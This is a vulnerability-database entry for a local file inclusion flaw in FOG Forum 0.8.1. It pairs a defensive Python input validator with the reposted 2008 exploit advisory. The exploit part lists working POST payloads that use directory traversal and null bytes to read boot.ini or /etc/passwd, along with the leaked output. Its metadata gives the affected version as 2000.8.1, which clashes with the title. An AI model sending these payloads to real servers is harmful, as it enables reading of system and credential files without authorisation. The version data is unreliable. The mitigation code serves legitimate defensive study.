Vendor: FOG Forum
By: CWH Underground
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 94
Product Name: FOG Forum
Affected Version From: 2000.8.1
Affected Version To: 2000.8.1
Patch Exists: NO
Related CWE: N/A
CPE: a:fog_project:fog_forum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web
Year: 2008

FOG Forum 0.8.1 Local File Inclusion Vulnerabilities

FOG Forum 0.8.1 is vulnerable to Local File Inclusion (LFI). An attacker can exploit it by sending crafted POST requests to the vulnerable path, http://[Target]/[Path]/index.php, using a web proxy such as WebScarab to intercept and edit the POST request data. The crafted requests use the parameters fog_skin, fog_lang, fog_pseudo, fog_password, fog_cook, fog_action, fog_userid, fog_path, and fog_posted. This allows the attacker to read local files such as boot.ini.

Mitigation:

To mitigate this vulnerability, the application should be configured to accept requests only from trusted sources and only with valid parameters.
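
One way to enforce "valid parameters" in front of index.php, as an added example that is not part of the advisory or of FOG Forum's code. The function name check_post_body, the name pattern for fog_skin and fog_lang, and the two benign sample bodies are assumptions made for illustration; the first sample is request data quoted in the advisory.

```python
import re
from urllib.parse import parse_qsl

# Assumption: skin and language names are short identifiers such as
# "default" or "francais"; this pattern is not taken from FOG Forum's code.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")
NAME_PARAMS = {"fog_skin", "fog_lang"}
# A ".." path segment delimited by "/" or "\" or the ends of the value.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def check_post_body(body: str) -> dict:
    """Return {parameter: reason} for each fog_* value that should be rejected."""
    rejected = {}
    # parse_qsl percent-decodes once, so "%00" is seen as a real NUL byte
    # and "%2e%2e%2f" as "../" before any rule is applied.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if not name.startswith("fog_"):
            continue
        if "\x00" in value:
            rejected[name] = "NUL byte"
        elif TRAVERSAL_RE.search(value):
            rejected[name] = "path traversal"
        elif name in NAME_PARAMS and not NAME_RE.fullmatch(value):
            rejected[name] = "not a valid name"
    return rejected


# Sample bodies: the first is request data quoted in the advisory,
# the other two are constructed for this example.
SAMPLES = [
    "fog_skin=default&fog_lang=../../../../../../../../boot.ini%00",
    "fog_skin=default&fog_lang=francais",
    "fog_posted=1&fog_pseudo=user@example.com&fog_password=secret&fog_cook=0",
]

if __name__ == "__main__":
    for body in SAMPLES:
        verdict = check_post_body(body) or "accepted"
        print(f"{verdict!s:40} {body}")
```

A request-layer check like this is a compensating control; the value that reaches the file-including code should still be matched against the set of installed skins and languages.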

Exploit-DB raw data:

=======================================================
 FOG Forum 0.8.1 Local File Inclusion Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : FOG Forum - PHP Board Engine
 VERSION     : 0.8.1
 VENDOR      : http://fog.daviveno.org
 DOWNLOAD    : http://fog.daviveno.org/streamearth/go_dl.php?download=1
#####################################################

---Local File Inclusion Exploit (POST Method)---

---Description---

[+]Use Web Proxy (Web Scarab, Burp Proxy, etc...) to intercept POST Method and edit in request data.
[+]All LFI Exploits were Vulnerabilities with POST Method

##############################################
Vulnerable File/Path:

[+]http://[Target]/[Path]/index.php

##############################################

---LFI Exploits (Use WebScarab to Edit request data)---

Send Request Data:

fog_skin=default&fog_lang=../../../../../../../../boot.ini%00
fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais
fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0&fog_action=0&fog_userid=cwhmail@cwh.com&fog_path=http://localhost/forum/index.php
fog_posted=../../../../../../../../boot.ini%00&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=../../../../../../../../boot.ini%00&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=../../../../../../../../boot.ini%00

Note: This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

      You can change boot.ini to /etc/passwd%00 in linux OS.

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-11]